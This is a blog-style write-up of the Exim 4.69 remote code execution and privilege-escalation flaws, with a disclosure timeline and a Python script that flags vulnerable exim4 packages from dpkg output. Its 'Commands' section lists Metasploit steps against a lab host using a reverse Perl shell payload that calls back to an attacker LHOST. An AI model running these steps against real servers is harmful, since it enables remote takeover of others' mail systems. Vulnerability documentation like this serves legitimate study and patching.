exim 4.69 remote code execution

Timeline :

Vulnerability discovered on 2010-12-07 by Sergey Kononenko
Vulnerability confirmed on 2010-12-10 by David Woodhouse
Exploit released on 2010-12-10 by hdm & jduck
Vulnerability corrected on 2008-12-02, but not identified as a vulnerability for two years! So the fix was not ported to most OS distributions.

    PoC provided by :

Sergey Kononenko
David Woodhouse
jduck
hdm

    Reference(s) :

CVE-2010-4345
CVE-2010-4344
OSVDB-69685

    Affected version(s) :

Versions up to and including 4.69, depending on the distribution's versioning

    Tested on Debian Lenny 5.0 with :

    exim4-base_4.69-9_i386.deb
    exim4-config_4.69-9_all.deb
    exim4-daemon-light_4.69-9_i386.deb
    exim4_4.69-9_all.deb

    dpkg -l | grep exim4
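Because the affected range is "4.69 and older, depending on the distribution's versioning", a quick triage step is to parse the `dpkg -l | grep exim4` output shown above and flag any exim4 package whose upstream release is at or below 4.69. The script below is an added example, not part of the original post or of the Exim project; it assumes the Debian version format `[epoch:]upstream[-revision]`, and the sample output it embeds is constructed to mirror the Lenny package list above (the `exim4-daemon-heavy` line with a made-up `4.72-1` version is there only to show a non-affected case). Note the caveat the "depending on the distrib versioning" remark implies: a distribution that backports the fix may keep the 4.69 upstream string, so a hit here means "check your distribution's security advisory", not "confirmed vulnerable".

```python
import re

# Constructed sample of `dpkg -l | grep exim4` output, modelled on the
# Lenny package list in this post; the exim4-daemon-heavy line with a
# made-up 4.72-1 version is added only to show a non-affected case.
SAMPLE_DPKG_OUTPUT = """\
ii  exim4               4.69-9  metapackage to ease Exim MTA (v4) installation
ii  exim4-base          4.69-9  support files for all Exim MTA (v4) packages
ii  exim4-config        4.69-9  configuration for the Exim MTA (v4)
ii  exim4-daemon-light  4.69-9  lightweight Exim MTA (v4) daemon
ii  exim4-daemon-heavy  4.72-1  Exim MTA (v4) daemon with extended features
"""

# Last upstream release named as affected on this page.
LAST_AFFECTED_UPSTREAM = (4, 69)


def upstream_version(debian_version):
    """Return the upstream part of a Debian version as a tuple of ints.

    Debian versions look like [epoch:]upstream[-revision], e.g. "1:4.69-9";
    the epoch and the packaging revision are dropped before comparing.
    """
    without_epoch = debian_version.split(":", 1)[-1]
    upstream = without_epoch.split("-", 1)[0]
    return tuple(int(n) for n in re.findall(r"\d+", upstream))


def is_affected(debian_version):
    """True when the upstream release is 4.69 or older (triage hint only:
    a distribution backport may keep the 4.69 string while being fixed)."""
    return upstream_version(debian_version) <= LAST_AFFECTED_UPSTREAM


def parse_dpkg_line(line):
    """Return (package, version) for an installed ("ii") package line, else None."""
    fields = line.split(None, 3)
    if len(fields) < 3 or not fields[0].startswith("ii"):
        return None
    return fields[1], fields[2]


def affected_packages(dpkg_output):
    """List (package, version) pairs for installed exim4 packages at <= 4.69."""
    hits = []
    for line in dpkg_output.splitlines():
        parsed = parse_dpkg_line(line)
        if parsed is None:
            continue
        name, version = parsed
        if name.startswith("exim4") and is_affected(version):
            hits.append((name, version))
    return hits


if __name__ == "__main__":
    for name, version in affected_packages(SAMPLE_DPKG_OUTPUT):
        print(f"{name} {version}: upstream release at or below 4.69")
```

On a real host, replace `SAMPLE_DPKG_OUTPUT` with the text of `dpkg -l | grep exim4`; the package that actually ships the daemon binary is the `exim4-daemon-*` one, so that line is the one that matters for the running service.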

    Description :

Two vulnerabilities that had been exploitable for two years have been discovered in the Exim MTA. Sergey Kononenko, an employee of a Ukrainian company, discovered one of them in the Exim4 mail server while investigating a compromise of the company's IT infrastructure; it had been exploitable for two years!
The vulnerability was reported to the Exim maintainers on December 7, and word quickly spread. It took Rapid7 researchers, authors of the Metasploit pen-testing framework, no more than three days to develop a working PoC that affects most Exim installations on all platforms (Debian, Ubuntu, Red Hat, CentOS, etc.).
At the same time, not one but two vulnerabilities were discovered. The first, CVE-2010-4344, permits remote arbitrary code execution with the privileges of the user running the Exim mail software. The second, CVE-2010-4345, allows escalation of privileges from the user running the Exim mail software to the superuser root.
Interestingly, the first vulnerability was corrected on December 2, 2008, but the fix was not flagged as a security fix. Because of this lack of communication, the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) shipping Exim were not warned of the vulnerability, and so the fix for the hidden vulnerability was never backported until now.

    Commands :

dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog

use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id

1 thought on “exim 4.69 remote code execution”

  1. Does this exploit have to be done locally? I mean on the same network? I ask because of those IPs! 192.168.172.* . Can I use this exploit via the internet?

    Thanks and sorry. I'm a newbie.
